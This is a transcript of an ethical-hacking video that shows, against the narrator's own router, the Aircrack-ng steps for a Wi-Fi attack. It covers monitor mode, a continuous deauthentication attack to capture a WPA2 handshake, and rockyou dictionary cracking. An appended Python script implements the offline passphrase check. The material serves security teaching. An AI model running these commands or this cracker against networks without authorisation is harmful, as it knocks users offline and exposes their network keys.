Advanced Wi-Fi Security 101: Test Your Wi-Fi Security Like a Pro | Ethical Hacking
10.93k views, 2785 words
Mohammad Fael
In this video, we explore how to test the security of your own Wi-Fi network using the Aircrack-ng s...
Video Transcript:
This video is strictly for educational purposes. Don't use these methods on networks you don't own or have permission to test; always stay on the right side of the law. Hey everyone, welcome back to another exciting video. Today we'll explore how Wi-Fi networks can be tested for security flaws using Aircrack-ng, a suite of tools used for understanding and securing wireless networks. Our goal is to help you protect your systems by understanding how attackers might target them. Before we dive into the hands-on part, let's cover a few important prerequisites. First, to follow along with this tutorial you need some basic knowledge of Linux commands. If you're not familiar with commands like ifconfig, iwconfig or ping, don't worry, I have already covered those in a previous video, so feel free to check it out before jumping into this one. Now, the tools you will need for this tutorial. We'll be using Kali Linux, which is my favourite distribution for penetration testing. If you don't have it installed, you can set it up easily on a virtual machine like I did; I made a video about that as well. There is one more important thing: your Wi-Fi adapter. Most built-in adapters aren't suitable for what we're about to do. You will need a Wi-Fi adapter that supports monitor mode and packet injection, like the Alfa adapter that appears on the screen right now. By the way, Alfa didn't sponsor me to say that, but I'm using an Alfa adapter, I found it very useful, and it didn't need any extra drivers to work. Lastly, and most importantly, you'll need a Wi-Fi network that you own or have permission to test. In this video I'll be testing my own TP-Link router to demonstrate how Aircrack-ng can be used to assess its security. To make it clear that this is my own network I'm testing, let me show you a quick screenshot from my TP-Link router's configuration page. As you can see, the network name "toone" matches the target network I'll be testing today. Again, this demonstration is purely for educational purposes, and I strongly encourage you to only test networks you own or have permission to test. This verification ensures that we are staying within ethical boundaries; ethical hacking is all about securing, not attacking.

All right, let's dive into the action. Start by checking whether Aircrack-ng is installed: I'll type the command aircrack-ng, and as you can see it's not installed on my system. This is a great opportunity to show you how to install it; it's very easy. The terminal is asking if I want to install the package, so I just type y to confirm, and once that's done we're good to go. Next, let's check that our Wi-Fi adapter is properly connected with the command iwconfig. Right now I don't have my Alfa adapter connected to this Kali machine, so it's not showing up in the list. I'm going to plug the Alfa adapter in through USB now. Watch closely and you will see an icon pop up in the bottom right corner of VMware; this little USB icon confirms that the adapter is recognised. A quick note here: if VMware asks whether you want to connect the adapter to the virtual machine or to the host, make sure to select the virtual machine. Let's check again with iwconfig to make sure the adapter is recognised and connected. As you can see, our adapter is all set.

Before we proceed, there is an important step we need to take. We need to kill any processes that might interfere with wireless monitoring, so we run sudo airmon-ng check kill. This is vital because background processes like NetworkManager and wpa_supplicant can switch the adapter back to managed mode or hop it to another channel while we are capturing. Now let's talk about the difference between managed mode and monitor mode. Normally your Wi-Fi adapter operates in managed mode, which means it is associated with one Wi-Fi network and communicates with that access point. To capture all the wireless traffic around us we need to switch to monitor mode, which lets the adapter listen to every 802.11 frame in range on the channel it is tuned to, whether or not the frame is addressed to us. It's like switching from being a participant in a conversation to quietly listening to everyone around you. Let's switch our adapter into monitor mode by running sudo airmon-ng start wlan0, where wlan0 is the wireless interface. Now let's verify that it is in monitor mode: I'll use iwconfig one more time, and as you can see the interface name has changed to wlan0mon, the "mon" referring to monitor mode, which means it's ready to capture wireless traffic. Let's clean up the terminal by typing clear to start fresh for the next steps.

Now that our Wi-Fi adapter is in monitor mode, it's time to start scanning for networks. To do that we run sudo airodump-ng wlan0mon, using the name of the monitor-mode interface. This shows us all the nearby Wi-Fi networks and devices that our adapter can detect. Let me quickly break down the columns you are seeing here, starting from the left. BSSID is the MAC address of each network's access point. PWR is the signal strength in dBm; the values are negative, and a number closer to zero (say -40 rather than -80) means a stronger signal. Beacons tells us how many beacon frames the network has sent out, while #Data shows the number of data packets captured so far. CH is the channel each network is operating on. MB shows the maximum speed supported by the network, followed by ENC, CIPHER and AUTH, which show the encryption in use, for example WPA or WPA2 with CCMP and a pre-shared key. Lastly we have ESSID, which is just the network's name. In my case I'm looking for my network, which I have named toone. A nice feature of airodump-ng is that you can sort the results on any column by pressing the s key; I can sort by BSSID, power or any other field. Let's hit s a few times so you can see how it works; you can see the order changing each time I press it, which is helpful if you want to sort by signal strength. Another useful feature is the ability to filter what you see: by pressing a we can cycle between showing just access points, just stations (the client devices connected to a network), or both. Now let's stop the scan, since we found the network, which is my own network toone. I'm only testing this, and I want to remind you that everything in this video is for educational purposes only. To stop the scan I press Ctrl+C.

Now that we have detected the network and gathered its information, let's move forward. In a new terminal window I'll start by moving to my desktop, where I want to keep everything organised: cd Desktop. Now on the desktop, I'll create a new folder to store the capture files and the dictionary we will use later; I'll call this folder test, so mkdir test, and move into it with cd test. This keeps everything clean and separate from system files. Now let's start capturing packets from our target network. We already know its BSSID, which is the MAC address of the router, and we know the channel it's operating on, which is channel 11 in my case. To start capturing we run sudo airodump-ng -w target -c 11 --bssid followed by the router's MAC address, and finally wlan0mon. Let's break that down: -w target tells airodump-ng to save the captured data to files whose names start with target (you can name it anything you want; airodump-ng appends a counter, so the first run produces target-01.cap), -c 11 locks the adapter to channel 11 instead of hopping, --bssid is where we provide the MAC address of the target access point so that only its traffic is captured, and wlan0mon is our wireless interface in monitor mode. The goal here is to capture a crucial part of Wi-Fi security called the four-way handshake. So what is this four-way handshake? Technically speaking, it is a series of four messages exchanged between a Wi-Fi access point and a device like your laptop or phone when they establish a secure connection. This is where the network and the device prove to each other that they know the pre-shared key and derive the session keys that will encrypt the data passing over the connection. The messages carry the two random nonces and a message integrity code (MIC) computed with a key derived from the passphrase; the passphrase itself is never transmitted, but anyone holding the handshake can derive the key from a guessed passphrase and check whether the MIC matches, entirely offline. That is why capturing the four-way handshake gives us enough information to attempt cracking the password later. And remember, it's crucial to only do this on networks you own or have permission to test. Right now the capture is running and we are waiting to capture that handshake.

Now that we are capturing packets and have our target network in sight, the next step is to speed things up by forcing the devices connected to the network to disconnect and reconnect, so that a fresh handshake takes place while we're listening. We can achieve this by running a deauthentication attack using the aireplay-ng command. In this terminal I'm going to run sudo aireplay-ng --deauth 0 -a followed by the BSSID, then wlan0mon. Let me break it down: --deauth 0 means we are sending deauthentication frames continuously; the zero means no limit, so it keeps sending until we stop it manually. The -a option specifies the BSSID, the MAC address of the target access point, and wlan0mon is our wireless adapter in monitor mode. Since we did not name a specific client with -c, the frames are broadcast to every device on the network. Before we run the command, I'll open another window showing my mobile phone's screen, which is currently connected to the target Wi-Fi, which is mine. This will help us see how the attack affects the devices on the network in real time. Let's hit Enter and see what happens. Now the deauthentication attack is running, and as you can see my phone has disconnected from the network; every time it tries to reconnect it fails, because the attack keeps sending deauthentication frames forged in the access point's name, telling the clients they have been dropped. This is how the attack works: it prevents devices from staying on the network for as long as it runs. It works at all because 802.11 management frames such as deauthentication are not authenticated unless the network uses Protected Management Frames (802.11w), which is optional in WPA2 and mandatory in WPA3; with PMF enabled, clients ignore the forged frames. A real-world analogy is a DoS attack that floods someone's inbox with emails so quickly that they can't keep up; the inbox becomes so full that they can't see or respond to any real email. Similarly, here the clients are flooded with deauthentication notices that keep them from staying connected. At the same time, if you look back at the terminal window where we're monitoring the target network, you will notice the message "WPA handshake:" followed by the BSSID has appeared at the top. This means we have successfully captured the four-way handshake, which is exactly what we were aiming for.

Now that we have that, we can stop the deauthentication attack by pressing Ctrl+C, and if you look at the phone's screen again you will see that I can successfully reconnect to the network since the attack has stopped. Next, let's stop monitoring the network, since we've captured what we need; I press Ctrl+C in the window where airodump-ng is capturing packets. Now it's important to return our wireless adapter to managed mode so it can function normally. I'll open a new terminal window to keep things clear, and run sudo airmon-ng stop wlan0mon, which stops monitor mode on our wireless adapter. Let's check that the adapter is back in managed mode by running iwconfig again; as you can see, it is back in managed mode, its normal state. Let's clear the terminal to clean things up. Next, since we ran sudo airmon-ng check kill earlier, which killed some network processes, we need to restart NetworkManager to get everything back to normal: sudo service NetworkManager restart. This ensures our network services are working properly again. Finally, let's clear the terminal once more.

Now that we have captured the handshake, the next step is to crack the password using a wordlist. First let's check whether we have wordlists installed: I'll type wordlists to see if it's available. As expected, the terminal is asking if I want to install the package, so let's type y to proceed. While that's installing, let me explain what wordlists are. A wordlist is essentially a dictionary of candidate passphrases, which we use in a dictionary attack. In this type of attack the cracking software tries each passphrase in the list against the captured handshake until it finds a match. One of the most famous wordlists is rockyou, which contains about 14 million real passwords from the 2009 RockYou breach, including most of the commonly used passwords around the world.

Now that the installation is complete, let's clear the terminal. Next, let's navigate to the folder where these wordlists are stored by typing cd /usr/share/wordlists. If we list the contents of this folder by typing ls, you'll see the file we are going to use, called rockyou.txt.gz; this is a compressed file. We will copy it to our project folder on the desktop, where we have the captured handshake files, so that everything stays in one place: cp rockyou.txt.gz followed by the path to the project folder. Now let's navigate back to our project folder and check that the file copied successfully by running ls. As you can see, the rockyou.txt.gz file is here. Let's extract it using gunzip rockyou.txt.gz and check again with ls to make sure the file has been unzipped. Now we have the uncompressed rockyou.txt file, which contains around 14 million of the most commonly used passphrases. It's incredible to think how many passwords out there are vulnerable because people use simple or common phrases. Make sure to avoid predictable passwords like 123456, password or anything like that, and if you are a Real Madrid fan, as we'll see in a bit, it's probably not a good idea to set your password to Real Madrid.

Now let's use the aircrack-ng command to start cracking the password, using the captured handshake file and the rockyou.txt wordlist: aircrack-ng target-01.cap -w rockyou.txt. Let me explain what this command does. target-01.cap is the file where our captured handshake is stored, and -w rockyou.txt specifies the wordlist we want to use. Essentially, aircrack-ng derives the key from each passphrase in the wordlist and checks it against the handshake until it finds the one that fits. As you can see, aircrack-ng is now processing each password in the wordlist. Depending on how far down the list the password sits, this could take some time, and if the password is not in the list at all it will never be found. We'll let it run, and as soon as it finds a match it will display the password. There it is: we found the password when the cracking process reached 99.
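The per-word check that aircrack-ng performs on the captured handshake, as an added worked example written for this page (not code from the video or from the Aircrack-ng project). Everything in it is constructed so it runs offline: the SSID toone from the video, made-up MAC addresses and nonces, an assumed passphrase "realmadrid" that the tiny stand-in wordlist happens to contain, and a minimal EAPOL-Key message 2/4 that stands in for the handshake inside target-01.cap. The derivation steps (PBKDF2 to PMK, the 802.11 PRF to PTK, HMAC-SHA1 MIC with the KCK) are the standard WPA2-PSK ones.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# --- Constructed handshake parameters: a stand-in for the video's capture, NOT real data ---
SSID = b"toone"                          # the network name used in the video
AP_MAC = bytes.fromhex("020000000a01")    # assumed, locally administered address
CLIENT_MAC = bytes.fromhex("020000000b02")
ANONCE = bytes(range(32))                 # assumed nonces; real ones are random
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "realmadrid"            # assumed; used only to forge the sample capture
# Constructed stand-in for rockyou.txt (the real list has about 14 million lines).
WORDLIST = ["123456", "password", "iloveyou", "realmadrid", "qwerty123"]

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11 PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    These 4096 iterations are the dominant cost of every guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """802.11 PRF: concatenated HMAC-SHA1(PMK, label || 0x00 || data || counter) blocks, where
    data = min(MACs) || max(MACs) || min(nonces) || max(nonces). WPA2/CCMP uses PRF-384 (48 bytes)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(3)]                    # 3 * 20 bytes >= 48
    return b"".join(blocks)[:48]                     # KCK = [0:16], KEK = [16:32], TK = [32:48]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2/4 (RSN descriptor, key info 0x010a = version 2 / pairwise / MIC)
    with an empty key-data field; real frames also carry the client's RSN IE there."""
    body = (b"\x02"                      # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                # key info
            + b"\x00\x10"                # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce
            + bytes(16)                  # key IV
            + bytes(8)                   # key RSC
            + bytes(8)                   # key ID / reserved
            + mic
            + b"\x00\x00")               # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 (Key)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 keyed with the KCK over the frame with its MIC field zeroed, cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(passphrase: str, frame: bytes, ssid: bytes = SSID,
                       ap_mac: bytes = AP_MAC, client_mac: bytes = CLIENT_MAC,
                       anonce: bytes = ANONCE, snonce: bytes = SNONCE) -> bool:
    """The per-word test a cracker runs: derive PMK -> PTK -> KCK and recompute the captured MIC."""
    if not 8 <= len(passphrase) <= 63:               # WPA-PSK length rule; such words can never match
        return False
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def forge_capture(passphrase: str) -> bytes:
    """Produce a message 2/4 whose MIC is valid under `passphrase`, standing in for target-01.cap."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


def dictionary_attack(wordlist: Iterable[str], frame: bytes) -> Optional[str]:
    """What `aircrack-ng target-01.cap -w rockyou.txt` does: return the first word whose MIC
    matches the capture, or None when the passphrase is not in the list at all."""
    for line in wordlist:
        candidate = line.rstrip("\r\n")              # wordlist files are one word per line
        if passphrase_matches(candidate, frame):
            return candidate
    return None


if __name__ == "__main__":
    capture = forge_capture(TRUE_PASSPHRASE)
    print("KEY FOUND:", dictionary_attack(WORDLIST, capture))
```

With a real capture you would pull the SSID, the two MAC addresses, the two nonces and one MIC-bearing EAPOL frame (message 2 or 4) out of target-01.cap and feed them to passphrase_matches in place of the constructed values. The loop also shows why a long random passphrase defeats this attack: each guess costs a full PBKDF2 run, and a passphrase that is in no wordlist never produces a matching MIC.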